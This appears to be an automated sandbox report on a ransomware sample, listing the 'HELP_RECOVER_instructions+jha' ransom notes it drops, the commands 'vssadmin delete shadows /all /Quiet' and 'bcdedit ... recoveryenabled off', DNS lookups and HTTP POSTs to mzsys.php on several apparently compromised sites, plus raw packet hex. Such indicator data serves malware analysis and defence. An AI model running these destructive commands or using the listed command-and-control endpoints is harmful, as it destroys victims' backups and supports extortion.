Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\excel4.xls
Creates FileC:\Documents and Settings\Administrator\Templates\wordpfct.wpd
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jha.html
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jha.html
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a208d8d f8dfffff 682c202c   cept: ......h, ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 202c202c 202c200d 0a436f6e    , , , , , ..Con
0x00000080 (00128)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000090 (00144)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x000000a0 (00160)   6d2d7572 6c656e63 6f646564 0d0a5573   m-urlencoded..Us
0x000000b0 (00176)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000c0 (00192)   612f352e 30202857 696e646f 7773204e   a/5.0 (Windows N
0x000000d0 (00208)   5420362e 333b2057 4f573634 3b205472   T 6.3; WOW64; Tr
0x000000e0 (00224)   6964656e 742f372e 303b2054 6f756368   ident/7.0; Touch
0x000000f0 (00240)   3b207276 3a31312e 3029206c 696b6520   ; rv:11.0) like 
0x00000100 (00256)   4765636b 6f0d0a48 6f73743a 20686e62   Gecko..Host: hnb
0x00000110 (00272)   2e6e6574 0d0a436f 6e74656e 742d4c65   .net..Content-Le
0x00000120 (00288)   6e677468 3a203634 350d0a43 61636865   ngth: 645..Cache
0x00000130 (00304)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000140 (00320)   68650d0a 0d0a6461 74613d32 30313832   he....data=20182
0x00000150 (00336)   31463334 43363344 38323032 43413438   1F34C63D8202CA48
0x00000160 (00352)   32333738 33353742 44303441 41343833   2378357BD04AA483
0x00000170 (00368)   45343744 30454241 45433846 37353745   E47D0EBAEC8F757E
0x00000180 (00384)   38363546 38333936 39304439 38323845   865F839690D9828E
0x00000190 (00400)   33443545 44314131 31353043 45394434   3D5ED1A1150CE9D4
0x000001a0 (00416)   42303030 39464531 34383932 45433046   B0009FE14892EC0F
0x000001b0 (00432)   32414233 32363734 44463334 46443535   2AB32674DF34FD55
0x000001c0 (00448)   35394237 39463634 41324342 33394431   59B79F64A2CB39D1
0x000001d0 (00464)   43384633 46354442 38333242 32353530   C8F3F5DB832B2550
0x000001e0 (00480)   32304231 41453742 30443433 33443637   20B1AE7B0D433D67
0x000001f0 (00496)   45363643 44433346 33323637 37323041   E66CDC3F3267720A
0x00000200 (00512)   37434630 30333642 35443245 37383738   7CF0036B5D2E7878
0x00000210 (00528)   39363539 39354434 34443032 33454332   965995D44D023EC2
0x00000220 (00544)   41333445 39394232 33364431 37393642   A34E99B236D1796B
0x00000230 (00560)   46424537 34303045 45323842 41304441   FBE7400EE28BA0DA
0x00000240 (00576)   41393130 46324245 44374536 30394134   A910F2BED7E609A4
0x00000250 (00592)   42374531 38353333 36313336 36444143   B7E1853361366DAC
0x00000260 (00608)   37413339 41433134 31463230 44353345   7A39AC141F20D53E
0x00000270 (00624)   44373139 43333735 46343143 45383739   D719C375F41CE879
0x00000280 (00640)   39343436 37344330 37393538 42393834   944674C07958B984
0x00000290 (00656)   36363245 38434430 43373043 39414543   662E8CD0C70C9AEC
0x000002a0 (00672)   33343231 39464639 42443945 41393442   34219FF9BD9EA94B
0x000002b0 (00688)   30443739 41384639 45303638 30333936   0D79A8F9E0680396
0x000002c0 (00704)   37333333 37423833 37313630 34373044   73337B837160470D
0x000002d0 (00720)   45313930 45314333 32384343 42373034   E190E1C328CCB704
0x000002e0 (00736)   39454334 42324232 30413433 44354335   9EC4B2B20A43D5C5
0x000002f0 (00752)   33323232 35353137 38423643 32364330   322255178B6C26C0
0x00000300 (00768)   44334238 39363235 36373445 36394635   D3B89625674E69F5
0x00000310 (00784)   36374442 36413942 41394630 38353937   67DB6A9BA9F08597
0x00000320 (00800)   41324641 44464337 36383031 36314243   A2FADFC7680161BC
0x00000330 (00816)   37444144 30394243 41364132 39463338   7DAD09BCA6A29F38
0x00000340 (00832)   42384141 36373939 44424544 45384532   B8AA6799DBEDE8E2
0x00000350 (00848)   45304533 32373639 41353842 44363634   E0E32769A58BD664
0x00000360 (00864)   32414233 33304433 35463339 39363139   2AB330D35F399619
0x00000370 (00880)   46423338 44413743 34334431 35333532   FB38DA7C43D15352
0x00000380 (00896)   37463738 41343731 44324633 45443233   7F78A471D2F3ED23
0x00000390 (00912)   33303731 41353335 36394437 36464546   3071A53569D76FEF
0x000003a0 (00928)   34443730 42313533 36453232 31393731   4D70B1536E221971
0x000003b0 (00944)   43314635 41343730 37383933 34324445   C1F5A470789342DE
0x000003c0 (00960)   41394545 34393236 383031              A9EE4926801

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a208d8d f8dfffff 682c202c   cept: ......h, ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c200d 0a436f6e    , , , , , ..Con
0x00000070 (00112)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000080 (00128)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000090 (00144)   6d2d7572 6c656e63 6f646564 0d0a5573   m-urlencoded..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f352e 30202857 696e646f 7773204e   a/5.0 (Windows N
0x000000c0 (00192)   5420362e 333b2057 4f573634 3b205472   T 6.3; WOW64; Tr
0x000000d0 (00208)   6964656e 742f372e 303b2054 6f756368   ident/7.0; Touch
0x000000e0 (00224)   3b207276 3a31312e 3029206c 696b6520   ; rv:11.0) like 
0x000000f0 (00240)   4765636b 6f0d0a48 6f73743a 20666972   Gecko..Host: fir
0x00000100 (00256)   65636865 65726c65 61646572 732e6672   echeerleaders.fr
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000130 (00304)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000140 (00320)   0d0a6461 74613d32 30313832 31463334   ..data=201821F34
0x00000150 (00336)   43363344 38323032 43413438 32333738   C63D8202CA482378
0x00000160 (00352)   33353742 44303441 41343833 45343744   357BD04AA483E47D
0x00000170 (00368)   30454241 45433846 37353745 38363546   0EBAEC8F757E865F
0x00000180 (00384)   38333936 39304439 38323845 33443545   839690D9828E3D5E
0x00000190 (00400)   44314131 31353043 45394434 42303030   D1A1150CE9D4B000
0x000001a0 (00416)   39464531 34383932 45433046 32414233   9FE14892EC0F2AB3
0x000001b0 (00432)   32363734 44463334 46443535 35394237   2674DF34FD5559B7
0x000001c0 (00448)   39463634 41324342 33394431 43384633   9F64A2CB39D1C8F3
0x000001d0 (00464)   46354442 38333242 32353530 32304231   F5DB832B255020B1
0x000001e0 (00480)   41453742 30443433 33443637 45363643   AE7B0D433D67E66C
0x000001f0 (00496)   44433346 33323637 37323041 37434630   DC3F3267720A7CF0
0x00000200 (00512)   30333642 35443245 37383738 39363539   036B5D2E78789659
0x00000210 (00528)   39354434 34443032 33454332 41333445   95D44D023EC2A34E
0x00000220 (00544)   39394232 33364431 37393642 46424537   99B236D1796BFBE7
0x00000230 (00560)   34303045 45323842 41304441 41393130   400EE28BA0DAA910
0x00000240 (00576)   46324245 44374536 30394134 42374531   F2BED7E609A4B7E1
0x00000250 (00592)   38353333 36313336 36444143 37413339   853361366DAC7A39
0x00000260 (00608)   41433134 31463230 44353345 44373139   AC141F20D53ED719
0x00000270 (00624)   43333735 46343143 45383739 39343436   C375F41CE8799446
0x00000280 (00640)   37344330 37393538 42393834 36363245   74C07958B984662E
0x00000290 (00656)   38434430 43373043 39414543 33343231   8CD0C70C9AEC3421
0x000002a0 (00672)   39464639 42443945 41393442 30443739   9FF9BD9EA94B0D79
0x000002b0 (00688)   41384639 45303638 30333936 37333333   A8F9E06803967333
0x000002c0 (00704)   37423833 37313630 34373044 45313930   7B837160470DE190
0x000002d0 (00720)   45314333 32384343 42373034 39454334   E1C328CCB7049EC4
0x000002e0 (00736)   42324232 30413433 44354335 33323232   B2B20A43D5C53222
0x000002f0 (00752)   35353137 38423643 32364330 44334238   55178B6C26C0D3B8
0x00000300 (00768)   39363235 36373445 36394635 36374442   9625674E69F567DB
0x00000310 (00784)   36413942 41394630 38353937 41324641   6A9BA9F08597A2FA
0x00000320 (00800)   44464337 36383031 36314243 37444144   DFC7680161BC7DAD
